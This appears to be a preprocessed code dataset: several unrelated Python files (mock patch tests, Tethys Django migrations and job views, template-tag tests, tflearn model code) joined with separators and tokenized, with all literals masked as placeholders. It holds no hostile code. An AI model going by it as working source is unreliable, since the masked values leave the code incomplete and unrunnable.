, new_callable = crasher ) <EOL> def thing3 ( ) : <EOL> pass <EOL> for func in thing1 , thing2 , thing3 : <EOL> self . assertRaises ( NameError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> self . assertEqual ( Foo . foo , original_foo ) <EOL> def test_patch_multiple_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> good = patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> good . attribute_name = '<STR_LIT:g>' <EOL> bad = patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> bad . attribute_name = '<STR_LIT>' <EOL> for additionals in [ good , bad ] , [ bad , good ] : <EOL> patcher . additional_patchers = additionals <EOL> @ patcher <EOL> def func ( ) : <EOL> pass <EOL> self . assertRaises ( AttributeError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_new_callable_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> original_foo = Foo . foo <EOL> def crasher ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> good = patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> good . attribute_name = '<STR_LIT:g>' <EOL> bad = patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> bad . attribute_name = '<STR_LIT:foo>' <EOL> for additionals in [ good , bad ] , [ bad , good ] : <EOL> patcher . additional_patchers = additionals <EOL> @ patcher <EOL> def func ( ) : <EOL> pass <EOL> self . assertRaises ( NameError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> self . assertEqual ( Foo . foo , original_foo ) <EOL> def test_patch_multiple_string_subclasses ( self ) : <EOL> for base in ( str , unicode ) : <EOL> Foo = type ( '<STR_LIT>' , ( base , ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> foo = Foo ( ) <EOL> @ patch . multiple ( foo , fish = '<STR_LIT>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . fish , '<STR_LIT>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo . fish , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> def test_patch_test_prefix ( self ) : <EOL> class Foo ( object ) : <EOL> thing = '<STR_LIT>' <EOL> def foo_one ( self ) : <EOL> return self . thing <EOL> def foo_two ( self ) : <EOL> return self . thing <EOL> def test_one ( self ) : <EOL> return self . thing <EOL> def test_two ( self ) : <EOL> return self . thing <EOL> Foo = patch . object ( Foo , '<STR_LIT>' , '<STR_LIT>' ) ( Foo ) <EOL> foo = Foo ( ) <EOL> self . assertEqual ( foo . foo_one ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . foo_two ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . test_one ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . test_two ( ) , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT:bar>' ) <EOL> def test_patch_dict_test_prefix ( self ) : <EOL> class Foo ( object ) : <EOL> def bar_one ( self ) : <EOL> return dict ( the_dict ) <EOL> def bar_two ( self ) : <EOL> return dict ( the_dict ) <EOL> def test_one ( self ) : <EOL> return dict ( the_dict ) <EOL> def test_two ( self ) : <EOL> return dict ( the_dict ) <EOL> the_dict = { '<STR_LIT:key>' : '<STR_LIT>' } <EOL> Foo = patch . dict ( the_dict , key = '<STR_LIT>' ) ( Foo ) <EOL> foo = Foo ( ) <EOL> self . assertEqual ( foo . bar_one ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( foo . bar_two ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( foo . test_one ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( foo . test_two ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> def test_patch_with_spec_mock_repr ( self ) : <EOL> for arg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , ** { arg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , repr ( m ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . class_attribute ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( m ( ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m ( ) . class_attribute ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_nested_autospec_repr ( self ) : <EOL> p = patch ( '<STR_LIT>' , autospec = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . SomeClass . wibble ( ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . SomeClass ( ) . wibble ( ) ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_mock_calls_with_patch ( self ) : <EOL> for arg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , ** { arg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> m . wibble ( ) <EOL> kalls = [ call . wibble ( ) ] <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> self . assertEqual ( m . method_calls , kalls ) <EOL> self . assertEqual ( m . wibble . mock_calls , [ call ( ) ] ) <EOL> result = m ( ) <EOL> kalls . append ( call ( ) ) <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> result . wibble ( ) <EOL> kalls . append ( call ( ) . wibble ( ) ) <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> self . assertEqual ( result . mock_calls , [ call . wibble ( ) ] ) <EOL> self . assertEqual ( result . wibble . mock_calls , [ call ( ) ] ) <EOL> self . assertEqual ( result . method_calls , [ call . wibble ( ) ] ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_imports_lazily ( self ) : <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> p1 = patch ( '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , p1 . start ) <EOL> squizz = Mock ( ) <EOL> squizz . squozz = <NUM_LIT:6> <EOL> sys . modules [ '<STR_LIT>' ] = squizz <EOL> p1 = patch ( '<STR_LIT>' ) <EOL> squizz . squozz = <NUM_LIT:3> <EOL> p1 . start ( ) <EOL> p1 . stop ( ) <EOL> self . assertEqual ( squizz . squozz , <NUM_LIT:3> ) <EOL> def test_patch_propogrates_exc_on_exit ( self ) : <EOL> class holder : <EOL> exc_info = None , None , None <EOL> class custom_patch ( _patch ) : <EOL> def __exit__ ( self , etype = None , val = None , tb = None ) : <EOL> _patch . __exit__ ( self , etype , val , tb ) <EOL> holder . exc_info = etype , val , tb <EOL> stop = __exit__ <EOL> def with_custom_patch ( target ) : <EOL> getter , attribute = _get_target ( target ) <EOL> return custom_patch ( <EOL> getter , attribute , DEFAULT , None , False , None , <EOL> None , None , { } <EOL> ) <EOL> @ with_custom_patch ( '<STR_LIT>' ) <EOL> def test ( mock ) : <EOL> raise RuntimeError <EOL> self . assertRaises ( RuntimeError , test ) <EOL> self . assertIs ( holder . exc_info [ <NUM_LIT:0> ] , RuntimeError ) <EOL> self . assertIsNotNone ( holder . exc_info [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' ) <EOL> self . assertIsNotNone ( holder . exc_info [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' ) <EOL> def test_create_and_specs ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , create = True , <EOL> ** { kwarg : True } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertRaises ( NameError , lambda : doesnotexist ) <EOL> p = patch ( MODNAME , create = True , ** { kwarg : True } ) <EOL> p . start ( ) <EOL> p . stop ( ) <EOL> def test_multiple_specs ( self ) : <EOL> original = PTModule <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , autospec = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec_set = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> def test_specs_false_instead_of_none ( self ) : <EOL> p = patch ( MODNAME , spec = False , spec_set = False , autospec = False ) <EOL> mock = p . start ( ) <EOL> try : <EOL> mock . does_not_exist <EOL> mock . does_not_exist = <NUM_LIT:3> <EOL> finally : <EOL> p . stop ( ) <EOL> def test_falsey_spec ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , ** { kwarg : <NUM_LIT:0> } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_spec_set_true ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec_set = True , ** { kwarg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertRaises ( AttributeError , setattr , m , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_callable_spec_as_list ( self ) : <EOL> spec = ( '<STR_LIT>' , ) <EOL> p = patch ( MODNAME , spec = spec ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertTrue ( callable ( m ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_not_callable_spec_as_list ( self ) : <EOL> spec = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> p = patch ( MODNAME , spec = spec ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertFalse ( callable ( m ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_stopall ( self ) : <EOL> unlink = os . unlink <EOL> chdir = os . chdir <EOL> path = os . path <EOL> patch ( '<STR_LIT>' , something ) . start ( ) <EOL> patch ( '<STR_LIT>' , something_else ) . start ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def patched ( mock_path ) : <EOL> patch . stopall ( ) <EOL> self . assertIs ( os . path , mock_path ) <EOL> self . assertIs ( os . unlink , unlink ) <EOL> self . assertIs ( os . chdir , chdir ) <EOL> patched ( ) <EOL> self . assertIs ( os . path , path ) <EOL> def test_wrapped_patch ( self ) : <EOL> decorated = patch ( '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_several_times_patch ( self ) : <EOL> decorated = patch ( '<STR_LIT>' ) ( function ) <EOL> decorated = patch ( '<STR_LIT>' ) ( decorated ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_patch_object ( self ) : <EOL> decorated = patch . object ( sys , '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_patch_dict ( self ) : <EOL> decorated = patch . dict ( '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_patch_multiple ( self ) : <EOL> decorated = patch . multiple ( '<STR_LIT>' , modules = { } ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_stopall_lifo ( self ) : <EOL> stopped = [ ] <EOL> class thing ( object ) : <EOL> one = two = three = None <EOL> def get_patch ( attribute ) : <EOL> class mypatch ( _patch ) : <EOL> def stop ( self ) : <EOL> stopped . append ( attribute ) <EOL> return super ( mypatch , self ) . stop ( ) <EOL> return mypatch ( lambda : thing , attribute , None , None , <EOL> False , None , None , None , { } ) <EOL> [ get_patch ( val ) . start ( ) for val in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> patch . stopall ( ) <EOL> self . assertEqual ( stopped , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_special_attrs ( self ) : <EOL> def foo ( x = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return x <EOL> with patch . object ( foo , '<STR_LIT>' , ( <NUM_LIT:1> , ) ) : <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:0> ) <EOL> with patch . object ( foo , '<STR_LIT>' , "<STR_LIT>" ) : <EOL> self . assertEqual ( foo . __doc__ , "<STR_LIT>" ) <EOL> self . assertEqual ( foo . __doc__ , "<STR_LIT>" ) <EOL> with patch . object ( foo , '<STR_LIT>' , "<STR_LIT>" ) : <EOL> self . assertEqual ( foo . __module__ , "<STR_LIT>" ) <EOL> self . assertEqual ( foo . __module__ , __name__ ) <EOL> if hasattr ( self . test_special_attrs , '<STR_LIT>' ) : <EOL> with patch . object ( foo , '<STR_LIT>' , dict ( [ ( '<STR_LIT:s>' , <NUM_LIT:1> , ) ] ) ) : <EOL> self . assertEqual ( foo . __annotations__ , dict ( [ ( '<STR_LIT:s>' , <NUM_LIT:1> , ) ] ) ) <EOL> self . assertEqual ( foo . __annotations__ , dict ( ) ) <EOL> if hasattr ( self . test_special_attrs , '<STR_LIT>' ) : <EOL> foo = eval ( "<STR_LIT>" ) <EOL> with patch . object ( foo , '<STR_LIT>' , dict ( [ ( '<STR_LIT:x>' , <NUM_LIT:1> , ) ] ) ) : <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( foo ( ) , <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import tethys_compute . utilities <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = tethys_compute . utilities . DictionaryField ( default = b'<STR_LIT>' , blank = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from . base import TethysGizmoOptions <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ButtonGroup ( TethysGizmoOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , buttons , vertical = False , attributes = '<STR_LIT>' , classes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( ButtonGroup , self ) . __init__ ( attributes = attributes , classes = classes ) <EOL> self . buttons = buttons <EOL> self . vertical = vertical <EOL> class Button ( TethysGizmoOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , display_text = '<STR_LIT>' , name = '<STR_LIT>' , style = '<STR_LIT>' , icon = '<STR_LIT>' , href = '<STR_LIT>' , <EOL> submit = False , disabled = False , attributes = { } , classes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( Button , self ) . __init__ ( attributes = attributes , classes = classes ) <EOL> self . display_text = display_text <EOL> self . name = name <EOL> self . style = style <EOL> self . icon = icon <EOL> self . href = href <EOL> self . submit = submit <EOL> self . disabled = disabled </s>
<s> from django . http import JsonResponse <EOL> from django . template . loader import render_to_string <EOL> from tethys_compute . models import TethysJob <EOL> from tethys_gizmos . gizmo_options . jobs_table import JobsTable <EOL> def execute ( request , job_id ) : <EOL> try : <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> job . execute ( ) <EOL> success = True <EOL> message = '<STR_LIT>' <EOL> except Exception , e : <EOL> success = False <EOL> message = str ( e ) <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:message>' : message } ) <EOL> def delete ( request , job_id ) : <EOL> try : <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> job . delete ( ) <EOL> success = True <EOL> message = '<STR_LIT>' <EOL> except Exception , e : <EOL> success = True <EOL> message = str ( e ) <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:message>' : message } ) <EOL> def update_row ( request , job_id ) : <EOL> try : <EOL> data = { key : val for key , val in request . POST . iteritems ( ) } <EOL> filter_string = data . pop ( '<STR_LIT>' ) <EOL> filters = [ f . strip ( '<STR_LIT>' ) for f in filter_string . strip ( '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) ] <EOL> job = TethysJob . objects . filter ( id = job_id ) [ <NUM_LIT:0> ] . child <EOL> row = JobsTable . get_rows ( [ job ] , filters ) [ <NUM_LIT:0> ] <EOL> data . update ( { '<STR_LIT>' : job , '<STR_LIT>' : row } ) <EOL> if job . label == '<STR_LIT>' : <EOL> job . statuses = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT:5> } <EOL> success = True <EOL> status = job . status <EOL> html = render_to_string ( '<STR_LIT>' , data ) <EOL> except Exception , e : <EOL> print '<STR_LIT>' , e <EOL> success = False <EOL> status = None <EOL> html = None <EOL> return JsonResponse ( { '<STR_LIT:success>' : success , '<STR_LIT:status>' : status , '<STR_LIT:html>' : html } ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( unique = True , max_length = <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import fudge <EOL> import urllib <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . safestring import SafeData <EOL> from . . _utils import TestCase <EOL> from ... templatetags import text_helpers <EOL> def generate_random_request ( match = "<STR_LIT>" , <EOL> url_template = "<STR_LIT>" ) : <EOL> request = fudge . Fake ( ) <EOL> request . has_attr ( META = { "<STR_LIT>" : url_template % match } ) <EOL> fudge . clear_calls ( ) <EOL> return request <EOL> def generate_random_request_and_context ( text , match = "<STR_LIT>" , <EOL> url_template = "<STR_LIT>" ) : <EOL> request = generate_random_request ( match = match , url_template = url_template ) <EOL> context = { <EOL> "<STR_LIT>" : request , <EOL> "<STR_LIT:text>" : text , <EOL> } <EOL> return request , context <EOL> class HelloWorld ( TestCase ) : <EOL> def test_data_returns_is_marked_as_safe ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> self . assertIsInstance ( result , SafeData ) <EOL> def test_gracefully_returns_when_lacking_request_object ( self ) : <EOL> text = "<STR_LIT>" <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( { "<STR_LIT:text>" : text } ) <EOL> self . assertEqual ( text , result ) <EOL> def test_raises_exception_when_debug_is_on ( self ) : <EOL> settings = fudge . Fake ( ) <EOL> settings . has_attr ( DEBUG = True ) <EOL> text = "<STR_LIT>" <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> with fudge . patched_context ( text_helpers , '<STR_LIT>' , settings ) : <EOL> self . assertRaises ( ImproperlyConfigured , node . render , { "<STR_LIT:text>" : text } ) <EOL> def test_works_with_referrers_with_no_q_get_param ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( <EOL> "<STR_LIT>" , url_template = "<STR_LIT>" , match = "<STR_LIT>" ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( { "<STR_LIT:text>" : text } ) <EOL> self . assertEqual ( text , result ) <EOL> def test_replaces_words_with_highlighted_word ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_can_handle_mismatched_case ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_can_handle_mixed_case ( self ) : <EOL> text = "<STR_LIT>" <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = "<STR_LIT:text>" ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_spaces_as_urlencoded_values ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_spaces_as_pluses ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_spaces ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_numbers ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_underscores ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_matches_hyphens ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = '<STR_LIT>' <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> expected = '<STR_LIT>' <EOL> self . assertEqual ( expected , result ) <EOL> def test_only_responds_to_a_subset_of_characters ( self ) : <EOL> text = "<STR_LIT>" <EOL> match = urllib . quote ( "<STR_LIT>" ) <EOL> request , context = generate_random_request_and_context ( text , <EOL> match = match ) <EOL> node = text_helpers . HighlightedSearchTermNode ( "<STR_LIT:text>" ) <EOL> result = node . render ( context ) <EOL> self . assertEqual ( text , result ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import tflearn <EOL> import tflearn . data_utils as du <EOL> from tflearn . datasets import cifar10 <EOL> ( X , Y ) , ( testX , testY ) = cifar10 . load_data ( ) <EOL> X , mean = du . featurewise_zero_center ( X ) <EOL> X , std = du . featurewise_std_normalization ( X ) <EOL> testX = du . featurewise_zero_center ( testX , mean ) <EOL> testX = du . featurewise_std_normalization ( testX , std ) <EOL> Y = du . to_categorical ( Y , <NUM_LIT:10> ) <EOL> testY = du . to_categorical ( testY , <NUM_LIT:10> ) <EOL> net = tflearn . input_data ( shape = [ None , <NUM_LIT:32> , <NUM_LIT:32> , <NUM_LIT:3> ] ) <EOL> net = tflearn . conv_2d ( net , <NUM_LIT:32> , <NUM_LIT:3> ) <EOL> net = tflearn . batch_normalization ( net ) <EOL> net = tflearn . activation ( net , '<STR_LIT:relu>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:4> , <NUM_LIT:32> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:1> , <NUM_LIT:32> , downsample = True , <EOL> regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:4> , <NUM_LIT:64> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:1> , <NUM_LIT:64> , downsample = True , <EOL> regularizer = '<STR_LIT>' ) <EOL> net = tflearn . shallow_residual_block ( net , <NUM_LIT:5> , <NUM_LIT> , regularizer = '<STR_LIT>' ) <EOL> net = tflearn . global_avg_pool ( net ) <EOL> net = tflearn . fully_connected ( net , <NUM_LIT:10> , activation = '<STR_LIT>' ) <EOL> mom = tflearn . Momentum ( <NUM_LIT:0.1> , lr_decay = <NUM_LIT:0.1> , decay_step = <NUM_LIT> , staircase = True ) <EOL> net = tflearn . regression ( net , optimizer = mom , <EOL> loss = '<STR_LIT>' ) <EOL> model = tflearn . DNN ( net , checkpoint_path = '<STR_LIT>' , <EOL> max_checkpoints = <NUM_LIT:10> , tensorboard_verbose = <NUM_LIT:0> , <EOL> clip_gradients = <NUM_LIT:1.0> ) <EOL> model . fit ( X , Y , n_epoch = <NUM_LIT:200> , validation_set = ( testX , testY ) , <EOL> show_metric = True , batch_size = <NUM_LIT> , shuffle = True , <EOL> run_id = '<STR_LIT>' ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import tensorflow as tf <EOL> from . . import losses <EOL> """<STR_LIT>""" <EOL> def add_weights_regularizer ( variable , loss = "<STR_LIT>" , weight_decay = <NUM_LIT> , <EOL> add_to_collection = None ) : <EOL> """<STR_LIT>""" <EOL> if not add_to_collection : <EOL> add_to_collection = tf . GraphKeys . REGULARIZATION_LOSSES <EOL> if isinstance ( loss , str ) : <EOL> regul = losses . get ( loss ) <EOL> weights_regularizer = regul ( variable , weight_decay ) <EOL> elif loss and callable ( loss ) : <EOL> weights_regularizer = loss ( variable ) <EOL> else : <EOL> weights_regularizer = loss <EOL> if add_to_collection : <EOL> tf . add_to_collection ( add_to_collection , weights_regularizer ) <EOL> return weights_regularizer <EOL> def add_activation_regularizer ( op , loss = "<STR_LIT>" , activ_decay = <NUM_LIT> , <EOL> add_to_collection = None ) : <EOL> raise NotImplementedError </s>
